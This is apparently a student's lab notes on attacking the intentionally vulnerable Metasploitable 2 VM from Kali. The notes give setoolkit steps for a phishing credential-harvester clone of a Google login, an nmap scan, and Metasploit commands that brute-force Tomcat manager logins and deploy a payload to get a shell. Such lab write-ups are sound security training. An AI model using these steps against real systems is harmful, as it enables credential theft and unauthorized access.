实验:Metasploitable 2

1. Lab environment

  • attacker: WSL2-kali
    • 172.26.40.207
  • vulnerable host: Metasploitable 2
    • Host-Only: 192.168.138.103
  • ping each other

2. Lab content

2.1. setoolkit

1
2
3
4
5
6
7
sudo setoolkit
1 # Social-Engineering Attacks
2 # Website Attack Vectors
3 # Credential Harvester Attack Method
1 # Web Templates
Enter # input the attacker (my PC) local IP address
2 # Google
  • Enter: Email test and Passwd test.

2.2. Nessus

configure

scan

2.3. nmap

1
nmap 192.168.138.103 -sV

2.4. Vsftpd Exploit

2.5. tomcat Exploit

we need to exploit the login service first.

1
2
3
4
5
search tomcat_mgr_login
use 0
set rhost 192.168.138.103
set rport 8180
exploit

so we got an username tomcat with its password tomcat.

then we need to get the shell, by exploiting the display service.

1
2
3
4
5
6
7
8
9
search tomcat_mgr_deploy
use 0 
set rhost 192.168.138.103
set rport 8180
set HttpPassword tomcat
set HttpUsername tomcat
exploit
shell
whoami

2.6. DVWA

  • set Security level to low

3. References